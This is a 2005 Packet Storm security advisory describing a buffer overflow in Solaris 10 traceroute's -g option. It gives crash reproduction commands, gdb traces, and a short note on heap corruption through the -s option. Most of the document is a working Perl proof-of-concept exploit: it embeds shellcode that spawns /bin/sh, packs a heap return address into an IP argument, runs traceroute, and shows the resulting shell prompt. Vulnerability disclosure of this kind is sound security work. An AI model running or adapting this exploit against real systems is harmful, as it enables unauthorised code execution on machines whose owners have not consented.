traceSolaris.txt

2005-06-25T00:00:00
ID PACKETSTORM:38290
Type packetstorm
Reporter Venglin
Modified 2005-06-25T00:00:00

Description

                                        
                                            `/usr/sbin/traceroute from Solaris 10 is vulnerable to buffer overflow in  
handling -g argument. After supplying 10 -g parameters, return address is  
overwritten by IP address argument:  
  
atari:root:/home/venglin# /usr/sbin/traceroute -g 1 -g 2 -g 3 -g 4 -g 5 -g 6 -g  
7 -g 8 -g 9 -g 10 127.0.0.1  
traceroute: too many IPv4 gateways  
traceroute: unknown IPv4 host 1  
traceroute to 127.0.0.1 (127.0.0.1), 30 hops max, 88 byte packets  
Segmentation fault (core dumped)  
  
atari:root:/home/venglin# gdb /usr/sbin/traceroute core  
[...]  
Core was generated by `/usr/sbin/traceroute -g 1 -g 2 -g 3 -g 4 -g 5 -g 6 -g 7  
-g 8 -g 9 -g 10 127.0.0'.  
Program terminated with signal 11, Segmentation fault.  
[...]  
#0 0x0100007f in ?? ()  
  
0x0100007f is of course 127.0.0.1.  
  
It is possible to run arbitrary code, but because of using __init_suid_priv(),  
impact is limited to raw socket access.  
  
It is interesting, that this vulnerability is specific to Solaris 10. It doesn't  
affect Solaris 8 or 9, nor the OpenSolaris.  
  
Proof of concept code:  
  
#!/usr/bin/perl  
  
$ret = 0x8046bb0; # heap, solaris on amd64  
  
$shellcode = "A" x 5000 .  
"\xb8\xff\xf8\xff\x3c\xf7\xd0\x50\x31\xc0\xb0\x9a\x50\x89\xe5\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68/bin\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\xb0\x3b\xff\xd5";  
  
$ip = sprintf("%d.%d.%d.%d", $ret & 0xff, ($ret & 0xff00) >> 8, ($ret &  
0xff0000) >> 16, ($ret & 0xff000000) >> 24);  
  
$cmd = "/usr/sbin/traceroute -g '$shellcode' -g 2 -g 3 -g 4 -g 5 -g 6 -g 7 -g 8  
-g 9 -g 10 $ip";  
  
print $cmd, "\n";  
  
system($cmd);  
  
  
  
atari:venglin:~> perl ./trace.pl  
traceroute: too many IPv4 gateways  
traceroute: unknown IPv4 host AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
[...]  
traceroute to 176.107.4.8 (176.107.4.8), 30 hops max, 88 byte packets  
$  
  
  
Another vulnerability is heap corruption after malformed -s argument:  
  
atari:root:/home/venglin# gdb /usr/sbin/traceroute core  
[...]  
#0 0xfee7178d in _free_unlocked ()  
from /lib/libc.so.1  
(gdb) bt  
#0 0xfee7178d in _free_unlocked () from /lib/libc.so.1  
#1 0xfee71752 in free () from /lib/libc.so.1  
#2 0xfefa49a6 in freeaddrinfo () from /lib/libsocket.so.1  
#3 0x08052a7a in main ()  
  
  
--   
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *  
* JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *  
`